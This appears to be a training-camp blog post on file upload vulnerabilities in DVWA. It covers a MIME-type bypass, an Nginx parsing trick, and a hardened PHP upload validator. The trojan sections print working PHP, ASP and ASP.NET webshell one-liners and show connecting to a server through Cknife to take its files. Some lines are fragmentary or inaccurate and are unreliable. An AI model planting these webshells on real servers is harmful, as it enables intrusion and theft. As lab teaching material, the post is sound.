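Senior student Han Shu (quite gentle) explained file upload vulnerabilities to us today, along with the use of tools such as Anrwsord and Cknife.
File upload vulnerabilities
If uploaded files are not restricted, the upload feature may be abused to place executable files or scripts on the server, and the script file can then be used to gain the ability to execute server-side commands.
Trojans
Classified by language, there are trojans for PHP, ASP, JSP, ASP.NET and other languages; classified by function, there are large trojans and small trojans.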
PHP one-liner trojans:
<?php echo shell_exec($_GET['a']); ?>
<?php echo shell_exec($_POST['a']); ?>
<?php @eval($_POST['a']); ?>
ASP one-liner trojan:
<%eval request("Cknife")%>
ASP.NET one-liner trojan:
<%@ Page Language="Jscript"%><%eval(Request.Item["Cknife"],"unsafe");%>
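shell_exec()
Executes a command through the shell environment and returns the complete output as a string.
eval()
Executes a string as PHP code; here it executes whatever the parameter a receives.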
DVWA's File Upload
Testing at the low level: the source code does not filter on any file format.
Write a one-liner trojan
One-liner trojan to connect to with Caidao (Chopper):
<?php @eval($_POST['a']); ?>
One-liner trojan used directly from the web page via GET:
<?php echo shell_exec($_GET['a']); ?>
One-liner trojan used from the web page via POST with HackBar:
<?php echo shell_exec($_POST['a']); ?>
Connecting with Cknife
After connecting, all files on the target server can be obtained.
Source code:
<?php
if (isset($_POST['Upload'])) {
    $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
    // The upload path is ../../hackable/uploads/
    $target_path = $target_path . basename( $_FILES['uploaded']['name']);
    // The upload path plus the name of the uploaded file
    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
        // Only whether the upload succeeded is checked, so files of any format can be uploaded
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    } else {
        echo '<pre>';
        echo $target_path . ' succesfully uploaded!';
        echo '</pre>';
    }
}
?>
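Bypassing server-side checks (MIME type check)
The server tests $_FILES['userfile']['type'] != "image/gif" to ensure that the uploaded file type is gif.
Bypass: capture the request with Burp and change the original Content-Type to a type that meets the requirement.
Content-Type: application/octet-stream
application/octet-stream is the file type format for php files.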
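html" is parsed as an asp type
Nginx parsing vulnerability: rename the php file to another file extension that passes the check, and when accessing it append "eval.php.jpg" after it, for example "evil.jpg/.php"; "evil.jpg" is then parsed as php.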
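A hardened counterpart to the low-level handler and the Content-Type check above, as an added example that is not DVWA's code or the author's. The function name `safe_upload_name`, the allowlist and the sample inputs are assumptions constructed for illustration; the function ignores the client-supplied file name and type, detects the type from the file's bytes, and returns a server-generated name.

```php
<?php
// Added example, not DVWA's code. The allowlist maps a detected content type
// to the extension the server stores; the client chooses neither.
const ALLOWED = ['image/gif' => 'gif', 'image/png' => 'png', 'image/jpeg' => 'jpg'];

/**
 * Decide how an uploaded temp file may be stored. Returns a server-generated
 * file name, or null when the upload is rejected. $_FILES[...]['name'] and
 * $_FILES[...]['type'] are deliberately not parameters: both come from the request.
 */
function safe_upload_name(string $tmpPath): ?string
{
    // Content type detected from the bytes on disk, not from the Content-Type header.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($detected === false || !isset(ALLOWED[$detected])) {
        return null;
    }
    // The bytes must also parse as an image of that same type.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info['mime'] !== $detected) {
        return null;
    }
    // Random name plus allowlisted extension: client names such as "a.php"
    // or "a.php.jpg" never reach the file system.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED[$detected];
}

// Constructed samples: a script sent with a forged Content-Type, and a 1x1 GIF
// sent with a generic one. Only the file contents decide the outcome.
$samples = [
    ['a.php', 'image/gif', "<?php /* placeholder script body */ ?>"],
    ['pic.gif', 'application/octet-stream',
        base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7')],
];
foreach ($samples as [$name, $claimedType, $bytes]) {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    $stored = safe_upload_name($tmp);
    printf("%-8s claimed=%-25s => %s\n", $name, $claimedType, $stored ?? 'REJECTED');
    unlink($tmp);
}
```

In an upload handler, pass `$_FILES['uploaded']['tmp_name']` and use the returned name as the destination for `move_uploaded_file()`, in a directory the web server does not execute scripts from. For the path-based Nginx parsing case, setting `cgi.fix_pathinfo=0` in php.ini keeps PHP-FPM from treating `evil.jpg/.php` as a script.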
大专栏 Training Camp Day 6: File Upload Vulnerabilities